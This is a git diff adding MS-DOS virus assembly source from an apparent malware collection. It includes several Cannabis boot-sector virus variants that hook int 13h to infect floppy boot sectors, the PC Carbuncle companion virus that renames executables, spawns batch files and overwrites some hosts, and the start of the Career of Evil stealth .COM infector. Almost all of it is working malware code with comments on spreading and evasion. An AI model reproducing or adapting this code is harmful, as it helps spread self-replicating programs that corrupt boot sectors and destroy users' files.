0, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 10 dup (0) + db 55h,0AAh +sub_4 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab3.asm b/MSDOS/Virus.MSDOS.Unknown.cannab3.asm new file mode 100644 index 00000000..c6d1a179 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab3.asm @@ -0,0 +1,280 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB3 圹 +;圹 圹 +;圹 Created: 6-Jun-92 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_14e equ 5Ch +data_15e equ 78h +data_23e equ 7C0Bh ;* +data_24e equ 7C11h ;* +data_25e equ 7C13h ;* +data_26e equ 7C15h ;* +data_27e equ 7C16h ;* +data_28e equ 7C18h ;* +data_29e equ 7C20h ;* +data_30e equ 7C3Eh ;* +data_31e equ 7C49h ;* +data_32e equ 7C50h ;* +data_33e equ 7DAFh ;* +data_34e equ 7DB3h ;* +data_35e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab3 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_14e + js loc_3 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_4 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_2 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_20 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_4 ; Jump if carry=0 +loc_2: + mov dx,offset data_16+0B7h ; ('') + +cannab3 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_3: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_4: + retn +sub_1 endp + +data_16 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' + db 7 +data_19 db 24h +data_20 db 0EBh + db 3Ch, 90h + db 'CANNABIS' + db 00h, 02h, 02h, 01h, 00h, 02h + db 70h, 00h + db 0D0h, 02h,0FDh, 02h, 00h, 09h + db 00h, 02h, 00h + db 34 dup (0) + db 0FAh,0FCh, 33h,0C0h, 8Eh,0D8h + db 8Eh,0D0h,0BCh, 00h, 7Ch,0BBh + db 58h, 7Dh,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 2Dh,0A3h,0AFh, 7Dh + db 0A1h, 4Eh, 00h,0A3h,0B1h, 7Dh + db 0BFh, 00h, 04h, 8Bh, 45h, 13h + db 48h, 89h, 45h, 13h,0B1h, 06h + db 0D3h,0E0h, 2Dh,0C0h, 07h, 8Eh + db 0C0h,0B9h, 00h, 02h, 8Bh,0F4h + db 8Bh,0FCh,0F3h,0A4h, 89h, 1Eh + db 4Ch, 00h, 8Ch, 06h, 4Eh, 00h + db 33h,0C0h, 16h, 07h + db 0BBh, 78h, 00h, 36h,0C5h, 37h + db 1Eh, 56h, 16h + db 53h + db 0BFh, 3Eh, 7Ch,0B9h, 0Bh, 00h + db 0F3h,0A4h, 06h, 1Fh,0C6h, 45h + db 0FEh, 0Fh, 8Bh, 0Eh, 18h, 7Ch + db 88h, 4Dh,0F9h, 89h, 47h, 02h + db 0C7h, 07h, 3Eh, 7Ch,0FBh,0CDh + db 13h, 72h, 48h, 33h,0C0h, 8Bh + db 0Eh, 13h, 7Ch, 89h, 0Eh, 20h + db 7Ch,0A1h, 16h, 7Ch,0D1h,0E0h + db 40h,0A3h, 50h, 7Ch,0A3h, 49h + db 7Ch,0A1h, 11h, 7Ch,0B1h, 04h + db 0D3h,0E8h, 01h, 06h, 49h, 7Ch + db 0BBh, 00h, 05h,0A1h, 50h, 7Ch + db 0E8h, 58h, 00h, 72h, 1Ch, 81h + db 3Fh, 49h, 4Fh, 75h, 09h, 81h + db 7Fh, 20h, 4Dh, 53h, 74h, 22h + db 0EBh + db 0Dh +loc_7: + cmp word ptr [bx],4249h + jne loc_8 ; Jump if not equal + cmp word ptr [bx+20h],4249h + je loc_9 ; Jump if equal +loc_8: + mov si,data_34e + call sub_3 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + pop si + pop ds + pop word ptr [si] + pop word ptr [si+2] + int 19h ; Bootstrap loader +loc_9: + mov bx,700h + mov cx,3 + mov ax,word ptr ds:[7C49h] + +locloop_10: + call sub_2 + jc loc_8 ; Jump if carry Set + inc ax + add bx,offset data_19 + loop locloop_10 ; Loop if cx > 0 + + mov ch,byte ptr ds:[7C15h] + mov dl,0 + mov bx,word ptr ds:[7C49h] + mov ax,0 +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 70h, 00h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + push ax + push cx + div byte ptr ds:[7C18h] ; al,ah rem = ax/data + cwd ; Word to double word + inc ah + shr al,1 ; Shift w/zeros fill + adc dh,0 + xchg ah,al + xchg ax,cx + mov ax,201h + int 13h ; Disk dl=drive ? ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + pop cx + pop ax + +loc_ret_11: + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near +loc_12: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_11 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_12 +sub_3 endp + + push ax + push ds + cmp ah,2 + jne loc_14 ; Jump if not equal + test dx,0FFFEh + jnz loc_14 ; Jump if not zero + or ch,ch ; Zero ? + jnz loc_14 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_14 ; Jump if not zero + push cx + push bx + push di + push si + push es + mov ax,201h + mov bx,7E00h + mov cl,1 + push cs + push cs + pop es + pop ds + pushf ; Push flags + push cs + call sub_4 + jc loc_13 ; Jump if carry Set + mov si,data_35e + mov di,data_23e + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cl,1 + pushf ; Push flags + push cs + call sub_4 +loc_13: + pop es + pop si + pop di + pop bx + pop cx +loc_14: + pop ds + pop ax + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + jmp dword ptr cs:data_33e + db 0, 0, 0, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 00h, 00h, 00h, 00h, 00h, 00h + db 55h,0AAh +sub_4 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab3i.asm b/MSDOS/Virus.MSDOS.Unknown.cannab3i.asm new file mode 100644 index 00000000..c6d1a179 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab3i.asm @@ -0,0 +1,280 @@ + +PAGE 59,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CANNAB3 圹 +;圹 圹 +;圹 Created: 6-Jun-92 圹 +;圹 Passes: 5 Analysis Options on: none 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_3e equ 43Fh +data_14e equ 5Ch +data_15e equ 78h +data_23e equ 7C0Bh ;* +data_24e equ 7C11h ;* +data_25e equ 7C13h ;* +data_26e equ 7C15h ;* +data_27e equ 7C16h ;* +data_28e equ 7C18h ;* +data_29e equ 7C20h ;* +data_30e equ 7C3Eh ;* +data_31e equ 7C49h ;* +data_32e equ 7C50h ;* +data_33e equ 7DAFh ;* +data_34e equ 7DB3h ;* +data_35e equ 7E0Bh ;* + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +cannab3 proc far + +start: + mov dx,13Dh + dec byte ptr ds:data_14e + js loc_3 ; Jump if sign=1 + mov dx,155h + call sub_1 + xor ah,ah ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + and al,0DFh + cmp al,59h ; 'Y' + jne loc_ret_4 ; Jump if not equal + mov dl,0 + mov ah,0 + int 13h ; Disk dl=drive a ah=func 00h + ; reset disk, al=return status + jc loc_2 ; Jump if carry Set + mov dx,1E6h + call sub_1 + mov cx,1 + mov bx,offset data_20 + mov ax,301h + cwd ; Word to double word + int 13h ; Disk dl=drive a ah=func 03h + ; write sectors from mem es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + jnc loc_ret_4 ; Jump if carry=0 +loc_2: + mov dx,offset data_16+0B7h ; ('') + +cannab3 endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near +loc_3: + mov ah,9 + int 21h ; DOS Services ah=function 09h + ; display char string at ds:dx + +loc_ret_4: + retn +sub_1 endp + +data_16 db 'Usage: A:', 0Dh, 0Ah + db '$' + db 'You are about to install a VIRUS' + db ' on your diskette!!!', 0Dh, 0Ah, 'I' + db 'nsert a formatted 360K diskette ' + db 'into the drive.', 0Dh, 0Ah, 'Are' + db ' you sure you want to proceed (y' + db '/N)? $' + db 0Dh, 0Ah, 0Ah, 'Writing...$' + db 0Dh, 0Ah, 'Error !!!' + db 7 +data_19 db 24h +data_20 db 0EBh + db 3Ch, 90h + db 'CANNABIS' + db 00h, 02h, 02h, 01h, 00h, 02h + db 70h, 00h + db 0D0h, 02h,0FDh, 02h, 00h, 09h + db 00h, 02h, 00h + db 34 dup (0) + db 0FAh,0FCh, 33h,0C0h, 8Eh,0D8h + db 8Eh,0D0h,0BCh, 00h, 7Ch,0BBh + db 58h, 7Dh,0A1h, 4Ch, 00h, 3Bh + db 0C3h, 74h, 2Dh,0A3h,0AFh, 7Dh + db 0A1h, 4Eh, 00h,0A3h,0B1h, 7Dh + db 0BFh, 00h, 04h, 8Bh, 45h, 13h + db 48h, 89h, 45h, 13h,0B1h, 06h + db 0D3h,0E0h, 2Dh,0C0h, 07h, 8Eh + db 0C0h,0B9h, 00h, 02h, 8Bh,0F4h + db 8Bh,0FCh,0F3h,0A4h, 89h, 1Eh + db 4Ch, 00h, 8Ch, 06h, 4Eh, 00h + db 33h,0C0h, 16h, 07h + db 0BBh, 78h, 00h, 36h,0C5h, 37h + db 1Eh, 56h, 16h + db 53h + db 0BFh, 3Eh, 7Ch,0B9h, 0Bh, 00h + db 0F3h,0A4h, 06h, 1Fh,0C6h, 45h + db 0FEh, 0Fh, 8Bh, 0Eh, 18h, 7Ch + db 88h, 4Dh,0F9h, 89h, 47h, 02h + db 0C7h, 07h, 3Eh, 7Ch,0FBh,0CDh + db 13h, 72h, 48h, 33h,0C0h, 8Bh + db 0Eh, 13h, 7Ch, 89h, 0Eh, 20h + db 7Ch,0A1h, 16h, 7Ch,0D1h,0E0h + db 40h,0A3h, 50h, 7Ch,0A3h, 49h + db 7Ch,0A1h, 11h, 7Ch,0B1h, 04h + db 0D3h,0E8h, 01h, 06h, 49h, 7Ch + db 0BBh, 00h, 05h,0A1h, 50h, 7Ch + db 0E8h, 58h, 00h, 72h, 1Ch, 81h + db 3Fh, 49h, 4Fh, 75h, 09h, 81h + db 7Fh, 20h, 4Dh, 53h, 74h, 22h + db 0EBh + db 0Dh +loc_7: + cmp word ptr [bx],4249h + jne loc_8 ; Jump if not equal + cmp word ptr [bx+20h],4249h + je loc_9 ; Jump if equal +loc_8: + mov si,data_34e + call sub_3 + xor ax,ax ; Zero register + int 16h ; Keyboard i/o ah=function 00h + ; get keybd char in al, ah=scan + pop si + pop ds + pop word ptr [si] + pop word ptr [si+2] + int 19h ; Bootstrap loader +loc_9: + mov bx,700h + mov cx,3 + mov ax,word ptr ds:[7C49h] + +locloop_10: + call sub_2 + jc loc_8 ; Jump if carry Set + inc ax + add bx,offset data_19 + loop locloop_10 ; Loop if cx > 0 + + mov ch,byte ptr ds:[7C15h] + mov dl,0 + mov bx,word ptr ds:[7C49h] + mov ax,0 +;* jmp far ptr loc_1 ;* + db 0EAh, 00h, 00h, 70h, 00h + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + push ax + push cx + div byte ptr ds:[7C18h] ; al,ah rem = ax/data + cwd ; Word to double word + inc ah + shr al,1 ; Shift w/zeros fill + adc dh,0 + xchg ah,al + xchg ax,cx + mov ax,201h + int 13h ; Disk dl=drive ? ah=func 02h + ; read sectors to memory es:bx + ; al=#,ch=cyl,cl=sectr,dh=head + pop cx + pop ax + +loc_ret_11: + retn +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near +loc_12: + lodsb ; String [si] to al + or al,al ; Zero ? + jz loc_ret_11 ; Jump if zero + mov ah,0Eh + mov bx,7 + int 10h ; Video display ah=functn 0Eh + ; write char al, teletype mode + jmp short loc_12 +sub_3 endp + + push ax + push ds + cmp ah,2 + jne loc_14 ; Jump if not equal + test dx,0FFFEh + jnz loc_14 ; Jump if not zero + or ch,ch ; Zero ? + jnz loc_14 ; Jump if not zero + xor ax,ax ; Zero register + mov ds,ax + test byte ptr ds:data_3e,1 + jnz loc_14 ; Jump if not zero + push cx + push bx + push di + push si + push es + mov ax,201h + mov bx,7E00h + mov cl,1 + push cs + push cs + pop es + pop ds + pushf ; Push flags + push cs + call sub_4 + jc loc_13 ; Jump if carry Set + mov si,data_35e + mov di,data_23e + mov cl,33h ; '3' + rep movsb ; Rep when cx >0 Mov [si] to es:[di] + mov ax,301h + mov bx,7C00h + mov cl,1 + pushf ; Push flags + push cs + call sub_4 +loc_13: + pop es + pop si + pop di + pop bx + pop cx +loc_14: + pop ds + pop ax + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_4 proc near + jmp dword ptr cs:data_33e + db 0, 0, 0, 0 + db 0Dh, 0Ah, 'Non-System disk or dis' + db 'k error', 0Dh, 0Ah, 'Replace and' + db ' press a key when ready', 0Dh, 0Ah + db 00h, 00h, 00h, 00h, 00h, 00h + db 55h,0AAh +sub_4 endp + + +seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cannab4.asm b/MSDOS/Virus.MSDOS.Unknown.cannab4.asm new file mode 100644 index 00000000..9e3a2886 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cannab4.asm @@ -0,0 +1,264 @@ +;**************************************************************************** +;* Cannabis version 4 +;* +;* Compile with TASM 2.0 +;* (other assemblers will probably not produce the same result) +;* +;* Disclaimer: +;* This file is only for educational purposes. The author takes no +;* responsibility for anything anyone does with this file. Do not +;* modify this file! +;**************************************************************************** + +cseg segment + assume cs:cseg,ds:cseg,es:nothing + + .RADIX 16 + +BASE equ 7C00 + + org 0 + +begin: jmp start + + org 3 + + db 'CANNABIS' ;BIOS parameter block + dw 0200 + db 2 + dw 1 + db 2 + dw 112d + dw 720d + db 0FDh + dw 2 + dw 9 + dw 2 + dw 0 + + org 3E + +start: cld ;initialise segments + stack + cli + xor ax,ax + mov ss,ax + mov ds,ax + mov sp,7C00 + + mov bx,offset ni13+BASE ;check int13 vector + mov ax,ds:[4*13] + cmp ax,bx + je installed + + mov ds:[oi13+BASE],ax ;save old vector + mov ax,ds:[4*13+2] + mov di,400 + mov ds:[oi13+2+BASE],ax + + mov ax,ds:[di+13] + dec ax + mov cl,6 + mov ds:[di+13],ax + + shl ax,cl + sub ax,07C0 + + mov cx,0200 ;copy virus to top + mov di,sp + mov es,ax + mov si,sp + rep movsb + + mov ds:[4*13+2],es ;set new vector + mov ds:[4*13],bx + +installed: xor ax,ax + push ss + pop es + mov bx,0078 + lds si,ss:[bx] ;ds:si = int 1E (=table ptr) + push ds + push si + push ss + push bx + mov cx,0bh + mov di,7C3Eh ;move table -> ds:7C3E + rep movsb + push es + pop ds + mov cx,ds:[7C18] + mov byte ptr [di-2], 0fh + mov [bx+2],ax + mov [di-7],cl + + mov word ptr [bx],7C3E + sti + int 13 ;reset disk + jc error + mov cx,ds:[7C13] ;number of sectors + mov ds:[7C20],cx + mov ax,ds:[7C16] ;calculate root-entry (FAT) + shl ax,1 + inc ax + mov ds:[7C49],ax ;save value + mov ds:[7C50],ax + + mov ax,ds:[7C11] ;calculate IO.SYS entry + mov cl,4 + shr ax,cl + add ds:[7C49],ax + + mov ax,ds:[7C50] + mov bx,0500 + call readsector + jc error + cmp word ptr [bx], 'OI' ;IO.SYS ? + jne ibmtest + cmp word ptr [bx+20], 'SM' ;MSDOS.SYS ? + je continue + jmp short error + +ibmtest: cmp word ptr [bx], 'BI' ;IBMBIO.COM ? + jne error + cmp word ptr [bx+20], 'BI' ;IBMDOS.COM ? + je continue + +error: mov si,offset errortxt+BASE ;print error-message + call print + xor ax,ax + int 16 ;wait for keypress + pop si ;restore int 1E vector + pop ds + pop [si] + pop [si+2] + int 19 ;boot again... + +continue: mov cx,3 ;at ds:0700 + mov bx,0700 + mov ax,ds:[7C49] + +nextsec: call readsector + jc error + add bx,0200 + inc ax + loop nextsec + + mov dl,0 + mov ch,ds:[7C15] ;go to begin IO.SYS + mov bx,ds:[7C49] + mov ax,0 + db 0EA, 0, 0, 70, 0 + + +;**************************************************************************** +;* Read a sector +;**************************************************************************** + +readsector: push cx + push ax + + div byte ptr ds:[7C18] ;al=sec/9 (0-160) ah=sec. (0-8) + cwd + inc ah ;ah=1-9 (sector) + shr al,1 ;al=0-80 (track) + adc dh,0 ;dh=0/1 (head) dl=0 (drive) + xchg ah,al + mov cx,0201 + xchg ax,cx + int 13 + + pop ax + pop cx +return: ret + + +;**************************************************************************** +;* Print message +;**************************************************************************** + +print: lodsb + or al,al + jz return + mov ah,0Eh + mov bx,7 + int 10 + jmp short print + + +;**************************************************************************** +;* Int 13 handler +;**************************************************************************** + +ni13: push ax + push ds + cmp ah,4 ;funktion 0-4? + ja cancel + cmp ch,1 + ja cancel + test dx,0FFFEh ;drive A: or B: ? (head=0) + jnz cancel + xor ax,ax + mov ds,ax + +infect: push cx + push bx + push di + push si + push es + mov ax,0201 ;read bootsector at 7E00 + mov bx,7E00 + mov cx,1 + push cs + push cs + pop ds + pop es + pushf + push cs + call orgint13 + jc exit + + mov di,7C0Bh ;move BPB to virus + mov cl,33 + mov si,7E0Bh + rep movsb + + mov ax,0301 ;write virus to boot-sector + mov bx,7C00 + mov cx,1 + pushf + push cs + call orgint13 + +exit: pop es + pop si + pop di + pop bx + pop cx + +cancel: pop ds + pop ax +orgint13: jmp dword ptr cs:[oi13+BASE] ;original vector + + +;**************************************************************************** +;* Data +;**************************************************************************** + +oi13 dw ?,? ;original int 13 vector + +errortxt db 0Dh, 0Ah, 'Non-System disk or disk error' + db 0Dh, 0Ah, 'Replace and press a key when ready' + db 0Dh, 0Ah, 0 + + + org 01FEh + + db 55, 0AA + +cseg ends + end begin + +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪 +; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪 +; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪 diff --git a/MSDOS/Virus.MSDOS.Unknown.carbunc.asm b/MSDOS/Virus.MSDOS.Unknown.carbunc.asm new file mode 100644 index 00000000..67777e27 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.carbunc.asm @@ -0,0 +1,244 @@ +;The PC CARBUNCLE VIRUS - a companion virus for Crypt Newsletter 14 +;The PC Carbuncle is a "toy" virus which will search out every .EXEfile +;in the current directory, rename it with a .CRP [for Crypt] extent and +;create a batchfile. The batchfile calls the PC Carbuncle [which has +;copied itself to a hidden file in the directory], renames the host +;file to its NORMAL extent, executes it, hides it as a .CRP file once +;again and issues a few error messages. The host files function +;normally. Occasionaly, the PC Carbuncle will copy itself to a few +;of the host .CRP files, destroying them. The majority of the host +;files in the PC Carbuncle-controlled directory will continue to function, +;in any case. If the user discovers the .CRP and .BAT files and is smart +;enough to delete the batchfiles and rename the .CRP hosts to their +;normal .EXE extents, the .CRPfiles which have been infected by the +;virus will re-establish the infection in the directory. +;--Urnst Kouch, Crypt Newsletter 14 + + .radix 16 + code segment + model small + assume cs:code, ds:code, es:code + + org 100h +begin: + jmp vir_start + db '釢.氣Nst哾塎$' ; name + +exit: + mov ah, 4Ch ; exit to DOS + int 21h +vir_start: + + mov ah,2Ch ; DOS get system time. + int 21h ; <--alter values to suit + cmp dh,10 ; is seconds > 10? + jg batch_stage ; if so, be quiet (jg) + ; with the virus counter, this feature arrests the + ; overwriting infection so + ; computing isn't + ; horribly disrupted + ; when the virus is about + mov al,5 ; infect only a few files + mov count,al ; by establishing a counter + + +start: mov ah,4Eh ; <----find first file of +recurse: + mov dx,offset crp_ext ; matching filemask, "*.crp" + int 21h ; because PC CARBUNCLE has + ; in most cases, already created + ; them. + jc batch_stage ; jump on carry to + ; spawn if no .CRPfiles found + + + mov ax,3D01h ; open .CRPfile r/w + mov dx,009Eh + int 21h + + mov bh,40h ; + mov dx,0100h ; starting from beginning + xchg ax,bx ; put handle in ax + mov cl,2Ah ; to write: PC CARBUNCLE + int 21h ; write the virus + mov ah,3Eh ; close the file + int 21h + + dec count ; take one off the count + jz exit ; and exit when a few files + ; are overwritten with virus + mov ah,4Fh ; find next file + jmp Short recurse ; and continue until all .CRP + ; files converted to PC + ; CARBUNCLE's + + ret + +batch_stage: + mov dx,offset file_create ; create file, name of + mov cx,0 ; CARBUNCL.COM + mov ah,3ch + int 21h + ; Write virus body to file + mov bx,ax + mov cx,offset last - offset begin + mov dx,100h + mov ah,40h + int 21h + + ; Close file + mov ah,3eh ; ASSUMES bx still has file handle + int 21h + + ; Change attributes + mov dx,offset file_create ; of created file to + mov cx,3 ;(1) read only and (2) hidden + mov ax,4301h + int 21h + + + + ; get DTA + mov ah, 1Ah ; where to put dta + lea DX, [LAST+90H] + int 21h + mov ah, 4Eh ; find first .EXE file +small_loop: ; to CARBUNCL-ize + lea dx, [vict_ext] ; searchmask, *.exe + int 21h + jc exit + mov si, offset last + 90h + 30d ; save name + mov di, offset orig_name + mov cx, 12d + rep movsb + + mov si, offset orig_name ; put name in bat buffer + mov di, offset bat_name + mov cx, 12d + rep movsb + + cld + mov di, offset bat_name + mov al, '.' + mov cx, 9d + repne scasb + push cx + cmp word ptr es:[di-3],'SU' ; useless rubbish + jne cont + mov ah, 4fh + jmp small_loop + +cont: mov si, offset bat_ext ;fix bat + mov cx, 3 + rep movsb + pop cx + mov si, offset blank ;further fix bat + rep movsb + + mov si, offset orig_name ; fill rename + mov di, offset rename_name + mov cx, 12d + rep movsb + + mov di, offset rename_name + mov al, '.' + mov cx, 9 + repne scasb + push cx + mov si, offset moc_ext ; fix rename + mov cx, 3 + rep movsb + pop cx + mov si, offset blank ; further fix rename + rep movsb ; copy the string over + + mov di, offset orig_name + mov al, ' ' + mov cx, 12 + repne scasb + mov si, offset blank ; put a few blanks + rep movsb + + mov si, offset orig_name ;fill in the created batfile + mov di, offset com1 + mov cx, 12d + rep movsb + + mov si, offset orig_name ; more fill + mov di, offset com2 + mov cx, 12d + rep movsb + + mov si, offset orig_name ; copy more fill + mov di, offset com3 + mov cx, 12d + rep movsb + mov si, offset blank +point_srch: dec di ; get rid of an annoying + cmp byte ptr [di], 00 ; period + jne point_srch + rep movsb + + mov si, offset rename_name ; copy more fill + mov di, offset moc1 + mov cx, 12d + rep movsb + + mov si, offset rename_name ; copy still more fill + mov di, offset moc2 + mov cx, 12d + rep movsb + + mov dx, offset orig_name ; rename original file + mov di, offset rename_name ; to new .CRP name + mov ah, 56h + int 21h + + mov dx, offset bat_name ; create batfile + xor cx, cx + mov ah, 3Ch + int 21h + + mov bx, ax + mov cx, (offset l_bat - offset s_bat) ; length of batfile + mov dx, offset s_bat ; write to file + mov ah, 40h + int 21h + + mov ah, 3eh ; close batfile + int 21h +next_vict: mov ah, 4fh ; find the next host + jmp small_loop ; and create more + ; "controlled" .CRPs +count db 90h ;<---count buffer, bogus value +crp_ext db "*.crp",0 ;<---- searchmask for PC CARBUNCLE +file_create db "CARBUNCL.COM",0 ;<---CARBUNCL shadow virus +bat_ext db "BAT" +Vict_ext db "*.exe",0 ;<----searchmask for hosts to CARBUNCL-ize +moc_ext db "CRP" ; new extent for CARBUNCL-ized hosts +blank db " " ;blanks for filling batchfile +S_bat: + db "@ECHO OFF",0Dh,0Ah ; <--batchfile command lines + db "CARBUNCL",0Dh,0Ah ; call PC CARBUNCL shadow virus + db "RENAME " +moc1 db 12 dup (' '),' ' +com1 db 12 dup (' '),0dh,0ah +com2 db 12 dup (' '),0dh,0ah + db "RENAME " +com3 db 12 dup (' '),' ' +moc2 db 12 dup (' '),0dh,0ah + db "CARBUNCL",0Dh,0Ah,01Ah ;<---put dumb message here +L_bat: ; format "ECHO Fuck you lamer" +note: db "PC CARBUNCLE: Crypt Newsletter 14",0 + +bat_name db 12 dup (' '),0 ; on the fly workspace +rename_name db 12 dup (' '),0 +orig_name db 12 dup (' '),0 +Last: ;<---- end of virus place-holder + + +code ends + end begin + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.caroevil.asm b/MSDOS/Virus.MSDOS.Unknown.caroevil.asm new file mode 100644 index 00000000..9aeab59c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.caroevil.asm @@ -0,0 +1,323 @@ +;CAREER OF EVIL virus: a simple memory resident .COMinfector +;which infects on execution and file open. CAREER OF EVIL also +;has limited stealth, subtracting its file size from infected files +;by diddling the file control block on "DIR" functions BEFORE the +;user sees the result onscreen. The virus recognizes infected +;files by setting a peculiar time-stamp in the unreported seconds +;field. Anti-virus measures are complicated when the virus is +;in memory by its ability to infect on file open. Scanning or +;operating any utilities which open files for inspection will +;spread the virus to every file examined in this manner. +;For best results, assemble CAREER OF EVIL with the A86 assembler. +;CAREER OF EVIL: prepared by Urnst Kouch for CRYPT NEWSLETTER 15, +;MAY-JUNE 1993. + + + code segment + assume cs:code, ds:code, es:code, ss:nothing + + org 0100h + + + +begin: call virus ; + +host db ' RottenUK' ; dummy place-holder where + ; virus stashes original 5-bytes + ; from host file +db 'Career of 